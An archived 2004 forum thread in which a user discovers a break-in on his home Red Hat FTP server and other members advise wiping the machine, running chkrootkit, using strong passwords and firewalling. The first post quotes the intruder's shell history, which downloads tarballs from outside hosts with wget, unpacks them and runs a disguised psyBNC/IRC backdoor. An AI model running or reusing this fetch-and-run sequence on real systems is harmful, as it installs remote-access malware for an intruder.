Massassi Forums Logo

This is the static archive of the Massassi Forums. The forums are closed indefinitely. Thanks for all the memories!

You can also download Super Old Archived Message Boards from when Massassi first started.

"View" counts are as of the day the forums were archived, and will no longer increase.

ForumsDiscussion Forum → Have I been hacked?
Have I been hacked?
2004-01-29, 8:20 AM #1
Well, I set up a Redhat 9 machine here at my house to run an FTP server for me to get to my files from wherever. It's not in a great place to sit and use it so if I need to do anything I usually SSH into it from my desktop with putty. Well I go on there today, and wanted to remember a command I typed a little while back, so I press up a few times and theres all this stuff I never did. Here's what was there:

w
export PATH="."
sh
w
cd /tmp
wget earth.prohosting.com/xc3te/up/psy.tgz
tar xzvf psy.tgz
cd psybnc
mv psybnc sh
bash
ls
cxd /tmp
cd /tmp
wget www.clauduma.com/lol/bnc.tar.gz
tar zxvf bnc.tar.gz
cd .bash
./psybnc
cd /tmp
ls
cd psybnc
ls -a
pco psybnc.conf
get www.silco.go.ro/work.tgz
tar -zxvf work.tgz
rm -rf work.tgz
cd work
rm -rf mech.set
wget www.silco.go.ro/mech.set

And it goes on and on...

I'm begining to think with windows this wouldn't have happened.


------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 8:24 AM #2
Linux hacked? IMPOSSIBLE! [/sarcasm]

------------------
Massassian since: March 12, 2001

[=-"The hardest thing is to forgive, but God does;
Even if you murdered or robbed, years wrong, but God loves;
Take one step toward him, he takes two toward you;
Even when all else fail, God supports you." - Nas-=]
Got a permanent feather in my cap;
Got a stretch to my stride;
a stroll to my step;
2004-01-29, 8:26 AM #3
Did you try visiting those urls to see what they might be....??

Maybe not the best advice.. but it's a start.

Not to state the obvious or anything, but from the looks of it, it looks like someone logged onto your FTP and started doing commands. one thing to suggest would be to remove the files that it got from those URLS, (the tars, etc. etc.)... maybe backup your stuff and re-format and reinstall redhat?

------------------
Fragment Thoughts consume my vision.

[This message has been edited by fragment (edited January 29, 2004).]
No-one knows what it's like to be the bad man,
to be the sad man Behind Blue Eyes.

- The Who
2004-01-29, 8:30 AM #4
Well the problem is I'm working on a deal to sell an audio engine I wrote, the backups of all the source are on this server. It would be very very bad for me if this source got out.

I'm not good enough with linux to know what this person did, all I can think of is maybe BNC is a varient of VNC. Which is just great... ERRRR.......

By the way, this angers me greatly.

------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 8:35 AM #5
A quick Google Groups search turned up http://groups.google.com/groups?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=psy.tgz&btnG=Google+Search

Id suggest wiping and resintalling. And . . .. well . . tighten up your security.

------------------
The future is here, and all bets are off.

[This message has been edited by GBK (edited January 29, 2004).]
And when the moment is right, I'm gonna fly a kite.
2004-01-29, 8:53 AM #6
Thanks GBK, turns out whatever they loaded will give them shell access to my machine from an IRC channel. Great. Doesn't surprise me though, as I used the same password for root as I did my ftp user name. I guess I'll just wipe it out and start fresh. Any suggestions on keeping this from happening again? Also is there a way I can find the IP of whoever did this, maybe I can get there ISP to do something...

------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 9:10 AM #7
A few suggestions...


1) Download chkrootkit. Run it religiously.

2) Make your root password long, unique, and never transmit it over the clear. (Always use SSH, never telnet)

3) Get a good firewall. Either a linux box running Smoothwall, or a real, honest-to-goodness hardware firewall.

4) Shut down every service your not using. Im serious. ANything you dont need, shut it off. The less your running, the more secure youll be.

5) Dont use RedHat. Use somethung like Trustix (designed for security) or OpenBSD (Only one remote hole in the default install, in more than 7 years!). I too run RedHat on my server, and Im definatly gonna wipe and and install one of the aforementioned . . . once I get around to it...


6) Change your password weekly. Or daily. Heck, rig a Perl script that changes it to a random 256 char-long string every 2 seconds... [http://forums.massassi.net/html/wink.gif]

7) At the firewall, block off every bleeding thing except FTP and SSH.

8) Dont give out your server's IP to just anyone. Remember, trust noone.... [http://forums.massassi.net/html/wink.gif]


..Ok, so the last 3 were something of a stretch... [http://forums.massassi.net/html/redface.gif]

------------------
The future is here, and all bets are off.
And when the moment is right, I'm gonna fly a kite.
2004-01-29, 9:36 AM #8
Downloading trustix now... Thanks again GBK.

------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 1:25 PM #9
One thing with that unique password thing: Make the password letters AND NUMBERS, its a hell of a lot better that way.

------------------
Madquack and Firbnic have a signature.
*Remnant Temple beta almost done*
Light And Darkness
I was just petting the bunny, and it went into the soup can, and part of my hand went with it. - Red vs Blue
2004-01-29, 2:27 PM #10
Don't put your source code on a machine that is connected ot the net, if you can help it.

------------------
[This message has been edited. Deal with it.]
[This message has been edited. Deal with it.]

↑ Up to the top!